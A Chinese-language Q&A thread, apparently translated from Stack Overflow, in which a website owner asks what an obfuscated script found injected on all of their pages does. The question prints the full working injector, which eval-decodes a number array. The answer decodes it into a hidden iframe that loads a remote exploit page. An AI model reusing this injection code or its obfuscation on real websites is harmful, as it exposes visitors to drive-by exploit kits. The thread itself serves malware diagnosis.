我有一个网站,我为一个关系运行,他们的AVG出现了“EXPLOIT BLACK HOLE EXPLOIT”或类似的东西。这似乎发生在网站被感染时,我认为它已被感染。我在所有页面上都找到了这行代码,我没有把它放在那里:http://pastebin.com/sJXgw8LX(是的,这就是一行)。
<body><!--398c3d--><script>b=new function(){return 2;};if(!+b)String.prototype.test='harC';for(i in $='esrhserh')if(i=='te'+'st')m=$[i];try{new Object().wehweh();}catch(q){ss="";}try{window['e'+'v'+'al']('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd='e';if({}.asd==='e')a=document['c'+'r'+'e'+'a'+'t'+'e'+'T'+'e'+'x'+'t'+'N'+'o'+'d'+'e']('321');if(a.data==321)x=-1*(d-d2);n=[-x+7,-x+7,-x+103,-x+100,-x+30,-x+38,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+101,-x+99,-x+114,-x+67,-x+106,-x+99,-x+107,-x+99,-x+108,-x+114,-x+113,-x+64,-x+119,-x+82,-x+95,-x+101,-x+76,-x+95,-x+107,-x+99,-x+38,-x+37,-x+96,-x+109,-x+98,-x+119,-x+37,-x+39,-x+89,-x+46,-x+91,-x+39,-x+121,-x+7,-x+7,-x+7,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+112,-x+38,-x+39,-x+57,-x+7,-x+7,-x+123,-x+30,-x+99,-x+106,-x+113,-x+99,-x+30,-x+121,-x+7,-x+7,-x+7,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+117,-x+112,-x+103,-x+114,-x+99,-x+38,-x+32,-x+58,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+30,-x+113,-x+112,-x+97,-x+59,-x+37,-x+102,-x+114,-x+114,-x+110,-x+56,-x+45,-x+45,-x+106,-x+104,-x+112,-x+114,-x+109,-x+44,-x+97,-x+109,-x+107,-x+45,-x+113,-x+115,-x+114,-x+112,-x+95,-x+45,-x+103,-x+108,-x+44,-x+97,-x+101,-x+103,-x+61,-x+98,-x+99,-x+100,-x+95,-x+115,-x+106,-x+114,-x+37,-x+30,-x+117,-x+103,-x+98,-x+114,-x+102,-x+59,-x+37,-x+47,-x+46,-x+37,-x+30,-x+102,-x+99,-x+103,-x+101,-x+102,-x+114,-x+59,-x+37,-x+47,-x+46,-x+37,-x+30,-x+113,-x+114,-x+119,-x+106,-x+99,-x+59,-x+37,-x+116,-x+103,-x+113,-x+103,-x+96,-x+103,-x+106,-x+103,-x+114,-x+119,-x+56,-x+102,-x+103,-x+98,-x+98,-x+99,-x+108,-x+57,-x+110,-x+109,-x+113,-x+103,-x+114,-x+103,-x+109,-x+108,-x+56,-x+95,-x+96,-x+113,-x+109,-x+106,-x+115,-x+114,-x+99,-x+57,-x+106,-x+99,-x+100,-x+114,-x+56,-x+46,-x+57,-x+114,-x+109,-x+110,-x+56,-x+46,-x+57,-x+37,-x+60,-x+58,-x+45,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+60,-x+32,-x+39,-x+57,-x+7,-x+7,-x+123,-x+7,-x+7,-x+100,-x+115,-x+108,-x+97,-x+114,-x+103,-x+109,-x+108,-x+30,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+112,-x+38,-x+39,-x+121,-x+7,-x+7,-x+7,-x+116,-x+95,-x+112,-x+30,-x+100,-x+30,-x+59,-x+30,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+97,-x+112,-x+99,-x+95,-x+114,-x+99,-x+67,-x+106,-x+99,-x+107,-x+99,-x+108,-x+114,-x+38,-x+37,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+37,-x+39,-x+57,-x+100,-x+44,-x+113,-x+99,-x+114,-x+63,-x+114,-x+114,-x+112,-x+103,-x+96,-x+115,-x+114,-x+99,-x+38,-x+37,-x+113,-x+112,-x+97,-x+37,-x+42,-x+37,-x+102,-x+114,-x+114,-x+110,-x+56,-x+45,-x+45,-x+106,-x+104,-x+112,-x+114,-x+109,-x+44,-x+97,-x+109,-x+107,-x+45,-x+113,-x+115,-x+114,-x+112,-x+95,-x+45,-x+103,-x+108,-x+44,-x+97,-x+101,-x+103,-x+61,-x+98,-x+99,-x+100,-x+95,-x+115,-x+106,-x+114,-x+37,-x+39,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+116,-x+103,-x+113,-x+103,-x+96,-x+103,-x+106,-x+103,-x+114,-x+119,-x+59,-x+37,-x+102,-x+103,-x+98,-x+98,-x+99,-x+108,-x+37,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+110,-x+109,-x+113,-x+103,-x+114,-x+103,-x+109,-x+108,-x+59,-x+37,-x+95,-x+96,-x+113,-x+109,-x+106,-x+115,-x+114,-x+99,-x+37,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+106,-x+99,-x+100,-x+114,-x+59,-x+37,-x+46,-x+37,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+114,-x+109,-x+110,-x+59,-x+37,-x+46,-x+37,-x+57,-x+100,-x+44,-x+113,-x+99,-x+114,-x+63,-x+114,-x+114,-x+112,-x+103,-x+96,-x+115,-x+114,-x+99,-x+38,-x+37,-x+117,-x+103,-x+98,-x+114,-x+102,-x+37,-x+42,-x+37,-x+47,-x+46,-x+37,-x+39,-x+57,-x+100,-x+44,-x+113,-x+99,-x+114,-x+63,-x+114,-x+114,-x+112,-x+103,-x+96,-x+115,-x+114,-x+99,-x+38,-x+37,-x+102,-x+99,-x+103,-x+101,-x+102,-x+114,-x+37,-x+42,-x+37,-x+47,-x+46,-x+37,-x+39,-x+57,-x+7,-x+7,-x+7,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+101,-x+99,-x+114,-x+67,-x+106,-x+99,-x+107,-x+99,-x+108,-x+114,-x+113,-x+64,-x+119,-x+82,-x+95,-x+101,-x+76,-x+95,-x+107,-x+99,-x+38,-x+37,-x+96,-x+109,-x+98,-x+119,-x+37,-x+39,-x+89,-x+46,-x+91,-x+44,-x+95,-x+110,-x+110,-x+99,-x+108,-x+98,-x+65,-x+102,-x+103,-x+106,-x+98,-x+38,-x+100,-x+39,-x+57,-x+7,-x+7,-x+123];for(i=0;i<n.length;i++)ss+=s(eval("n"+"[i"+"]"));eval(ss);</script><!--/398c3d-->
该代码有什么作用?
答案 0 :(得分:3)
以下是评估过的javascript:
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("<iframe src='http://xxxxxxx/sutra/in.cgi?default' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://xxxxx/sutra/in.cgi?default');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
我对实际的主机名进行了模糊处理,以防止进一步的损坏。在该页面中,还有另一个半混淆的javascript,它将您的浏览器重定向到同一主机上的另一个页面,这可能会迫使访问者浏览器下载某些内容。我没有继续遵循代码到最终目的地.l